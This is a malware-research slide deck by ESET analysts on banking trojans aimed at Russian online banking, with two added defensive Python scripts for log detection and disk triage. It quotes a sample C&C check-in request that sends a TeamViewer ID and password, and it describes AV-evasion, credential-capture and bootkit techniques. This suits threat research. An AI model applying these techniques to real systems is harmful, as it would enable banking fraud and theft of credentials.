![Page 1: Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs’ developing for RBS systems](https://reader033.vdocument.in/reader033/viewer/2022060111/5565896fd8b42a723f8b5269/html5/thumbnails/1.jpg)
Modern malware techniques for attacking RBS systems in Russia
Aleksandr Matrosov
Eugene Rodionov
Who are we?
Malware researchers at ESET
- complex threats analysis
- development of cleaning tools
- tracking new malware techniques
- investigation of cybercrime groups
http://www.joineset.com/
Agenda
o Cybercrime trends in RBS
o Most prevalent threats and incidents
Win32/Shiz
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
Win32/Carberp
o Carberp cybercrime group revenue
Overview
o 2010/11: years of attacks on Russian banks
  the number of incidents has more than doubled compared to 2010*
o Over 92%* of incidents involve banking trojans
o Malware tailored to Russian banks and payment systems
o However! It can be (and is) used in other countries as well
*research report "The Russian cybercrime market in 2010: status and trends", http://www.group-ib.ru/wp-content/uploads/2011/04/Group-IB_Report_Russian-cybercrime-market_2010_eng.pdf
Interesting facts about Russian bank fraud
These guys are still free!
Evolution of RBS trojans
o RBS Trojans 2009-2010:
Win32/Shiz (2009)
Win32/Carberp
Win32/Hodprot
Win32/Sheldor
Win32/RDPdoor
o RBS Trojans 2011:
Multiple updates
Growing incidents numbers
….
Win32/Carberp with Bootkit
Cybercrime landscape (2010)
Cybercrime landscape (2011)
Cybercrime landscape (2011)
Win32/Spy.Shiz
Win32/Spy.Shiz detection statistics by month (cloud data from Live Grid), August 2009 – November 2011
Win32/Spy.Shiz detection statistics by country (cloud data from Live Grid)
Win32/Spy.Shiz: stealing money
Win32/Hodprot
Win32/Hodprot detection statistics by month (cloud data from Live Grid), July 2010 – November 2011
Win32/Hodprot detection statistics by country (cloud data from Live Grid)
Win32/Hodprot: antiforensics (diagram of the main module: original sfcfiles.dll, kernel driver image, loader code, C&C URLs)
Win32/Hodprot: injecting payload (diagram)
User-mode: Browser address space, Winlogon address space, sfcfiles.dll, Setupapi.dll, Payload, System Registry
Kernel-mode: sfc.sys
Steps shown: Install & Load Driver, Assemble Payload, Inject Payload, Update Payload
Win32/Hodprot: C&C protocol (diagram)
Bot -> C&C server: send request (bot ID, integer)
C&C server: handle request
C&C server -> bot: reply with updated modules and image to execute
Bot: update the bot's modules, run downloaded executable
Bot -> C&C server: send status information
Win32/Sheldor & Win32/RDPdoor
Win32/Sheldor and TeamViewer in action (diagram: infected computer, TeamViewer cloud, Win32/Sheldor C&C)
1. Request cloud ID
2. Set cloud ID
3. Send ID to C&C: GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
4. Malicious connection
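A detection-side example, added here and not taken from the deck: it scans constructed proxy log lines for the check-in shape shown above (path /getinfo.php with id, pwd and stat parameters, where id is a space-separated nine-digit TeamViewer ID) and extracts the ID so a responder can correlate the remote session. The log layout, hosts and addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (not real traffic). The second and third
# entries mimic the check-in shown on the slide: GET /getinfo.php?id=...&pwd=...&stat=...
SAMPLE_LOG = """\
2011-11-02T10:14:03Z 10.0.0.15 GET http://cdn.example-static.net/js/app.js 200
2011-11-02T10:14:07Z 10.0.0.15 GET http://198.51.100.7/getinfo.php?id=414%20034%20883&pwd=6655&stat=1 200
2011-11-02T10:15:11Z 10.0.0.22 GET http://198.51.100.7/getinfo.php?id=123%20456%20789&pwd=1234&stat=0 200
2011-11-02T10:16:40Z 10.0.0.31 GET http://intranet.example.local/getinfo.php?page=1 200
"""

# Assumed log layout: timestamp, client IP, method, URL, HTTP status
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+GET\s+(?P<url>\S+)\s+(?P<status>\d{3})$")
# A TeamViewer ID is nine digits; the beacon sends it with spaces ("414 034 883", URL-encoded as %20)
TV_ID_RE = re.compile(r"^\d{3}(?: ?\d{3}){2}$")


def parse_beacon(url):
    """Return the decoded check-in fields if `url` has the Sheldor shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/getinfo.php"):
        return None
    query = parse_qs(parts.query)  # parse_qs already decodes %20 to a space
    if not {"id", "pwd", "stat"}.issubset(query):
        return None
    tv_id = query["id"][0]
    if not TV_ID_RE.match(tv_id):
        return None
    return {"cnc_host": parts.hostname, "teamviewer_id": tv_id.replace(" ", ""),
            "pwd": query["pwd"][0], "stat": query["stat"][0]}


def find_sheldor_beacons(log_text):
    """Scan log lines and return every Sheldor-style check-in with its source host."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        beacon = parse_beacon(m.group("url"))
        if beacon:
            hits.append({"ts": m.group("ts"), "src": m.group("src"), **beacon})
    return hits


if __name__ == "__main__":
    for hit in find_sheldor_beacons(SAMPLE_LOG):
        print(hit)
```

The recovered TeamViewer ID is the pivot for the response: it identifies the session a remote operator would attach to, so it can be matched against TeamViewer connection logs on the host.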
Under the hood: DLL hooking (diagram: TeamViewer.exe, TV.dll as proxy DLL, original TS.dll)
Malicious DLL call graph
Malicious DLL decompilation (annotated screenshot: load original TS.dll, hook functions, functions for calling from original TS.dll, C&C URL)
Sheldor C&C panel
Win32/RDPdoor installation (diagram: infected computer, Win32/RDPdoor C&C)
1. Run dropper and send system information
2. Authentication on C&C; the C&C provides Thinsoft BeTwin for installation
3. Send status information
Stealing authentication data
1. Install GINA extension DLL
2. Display fake logon screen
3. Capture user name & password
4. Send to C&C
Win32/Carberp
Win32/Carberp detections over time in Russia (cloud data from Live Grid), January 2010 – November 2011
Win32/Carberp detection statistics by country (cloud data from Live Grid)
Self-protecting functionality (technique: implementation)
Bypassing AV-emulators: many calls of rare WinAPI functions
Code injection method: ZwQueueApcThread(), ZwResumeThread()
Unhooking method: checking first bytes of API function body and deleting hooks
Command and string encryption: custom encryption algorithm
Bot authentication on C&C: file with authentication data stored on infected PC
Network communication encryption: base64( RC2(data) )
API function calls obfuscation: custom hash algorithm
Detection of AV hooks: comparison of the first original bytes
Bypassing static AV signatures: appending random junk bytes to dropped files
Hiding in the system: hooking system functions; bootkit infector (September 2011)
Carberp going deeper since September 2011
Carberp going deeper since September 2011 (boot sequence diagram)
1. Load MBR
2. Load VBR
3. Load bootstrap code (target of Rovnix & Carberp)
4. Load bootmgr
5. Load winload.exe or winresume.exe
6. Load kernel and boot start drivers
The diagram marks the early stages as real mode and the later stages as real mode/protected mode.
Carberp: Infected Partition Layout
Before infecting: MBR | VBR | Bootstrap Code | File System Data
After infecting: MBR | VBR | Malicious Code | File System Data, plus a malicious unsigned driver stored as compressed data
NTFS bootstrap code: 15 sectors
o Carberp overwrites the bootstrap code of the active partition
o The malicious driver is written either before the active partition, if there is enough space there, or otherwise at the end of the hard drive
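A triage helper, added here and not part of the deck, that reads an MBR-partitioned raw disk image, locates the active partition's bootstrap sectors (the area the slide says Carberp overwrites) and the unpartitioned gaps before the active partition and after the last partition (where the driver image is stored), and counts the non-zero sectors in each so an analyst can spot data hiding outside any file system. The disk image is constructed inline; on a real image the bootstrap sectors would also be hashed against a known-good copy.

```python
import struct

SECTOR = 512
NTFS_BOOTSTRAP_SECTORS = 15  # from the slide: NTFS bootstrap code is 15 sectors following the VBR

def parse_mbr_partitions(mbr):
    """Parse the four 16-byte partition entries of a classic MBR (table at offset 446)."""
    parts = []
    for i in range(4):
        entry = mbr[446 + 16 * i: 446 + 16 * (i + 1)]
        boot_flag, ptype = entry[0], entry[4]
        start, size = struct.unpack_from("<II", entry, 8)
        if ptype and size:
            parts.append({"index": i, "active": boot_flag == 0x80, "type": ptype,
                          "start": start, "end": start + size - 1})
    return parts

def nonzero_sectors(disk, first, last):
    """Count sectors in the inclusive LBA range [first, last] holding any non-zero byte."""
    return sum(1 for s in range(first, last + 1) if any(disk[s * SECTOR:(s + 1) * SECTOR]))

def triage_layout(disk):
    """Report the regions a Carberp-style bootkit touches: the active partition's
    bootstrap sectors (overwritten) and the unpartitioned gaps before the active
    partition and after the last partition (where the driver image is stored)."""
    total = len(disk) // SECTOR
    parts = parse_mbr_partitions(disk[:SECTOR])
    active = next(p for p in parts if p["active"])
    prev_end = max([0] + [p["end"] for p in parts if p["end"] < active["start"]])  # sector 0 = MBR
    last_end = max(p["end"] for p in parts)
    regions = {
        "bootstrap": (active["start"] + 1, active["start"] + NTFS_BOOTSTRAP_SECTORS),
        "gap_before_active": (prev_end + 1, active["start"] - 1),
        "gap_after_last": (last_end + 1, total - 1),
    }
    return {name: {"first": a, "last": b, "nonzero": nonzero_sectors(disk, a, b) if a <= b else 0}
            for name, (a, b) in regions.items()}

def build_sample_disk():
    """Constructed 2 MB image: one active NTFS partition at LBA 64 (3968 sectors),
    with a fake driver blob planted in the unpartitioned gap in front of it."""
    total = 4096
    disk = bytearray(total * SECTOR)
    disk[446:462] = struct.pack("<B3sB3sII", 0x80, b"\0\0\0", 0x07, b"\0\0\0", 64, 3968)
    disk[510:512] = b"\x55\xaa"                      # MBR signature
    disk[64 * SECTOR:64 * SECTOR + 3] = b"\xebR\x90"  # NTFS VBR jump stub
    disk[10 * SECTOR:14 * SECTOR] = b"\xcc" * (4 * SECTOR)  # planted blob: 4 non-zero sectors
    return bytes(disk)

if __name__ == "__main__":
    for region, info in triage_layout(build_sample_disk()).items():
        print(region, info)
```

A non-zero count in either gap is not proof of infection (boot managers and OEM tools also use the space before the first partition), but it tells the analyst which sectors to carve and inspect.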
Interesting strings and investigation
Win32/Carberp: money stealing methods (stealing technique: functionality)
Web-injects/Autoloads (IE, FF, Chrome, Opera): inserting the specified JS code into HTML returned by the online banking site
Backconnect backdoor (RDP/VNC): loading on request a special binary module (RDPdoor, custom VNC client)
Keylogger (based on WinAPI): recording keyboard events into a logfile
ScreenSpy (based on WinAPI): saving screenshots into a logfile
Grabbers (Form, FTP, Pass): loading on request a special binary module
Custom plugins for RBS: binary modules for specified RBS (sber.plug)
Win32/Carberp botnet control panel
C&C with stolen data
Cab-files with stolen data
Stolen data: BS-Client IB system
Stolen data: CyberPlat payment system
Stolen data: iBank IB system
Stolen data: SberBank IB
Stolen data: UkrSibBank IB
References
“Cybercrime in Russia: Trends and issues”
http://go.eset.com/us/resources/white-papers/CARO_2011.pdf
“Evolution of Win32/Carberp: going deeper”
http://blog.eset.com/2011/11/21/evolution-of-win32carberp-going-deeper
“Hodprot: Hot to Bot”
http://go.eset.com/us/resources/white-papers/Hodprot-Report.pdf
Follow ESET Threat Blog http://blog.eset.com
Questions
Thank you for your attention ;)
Aleksandr Matrosov [email protected]
@matrosov
Eugene Rodionov [email protected]
@vxradius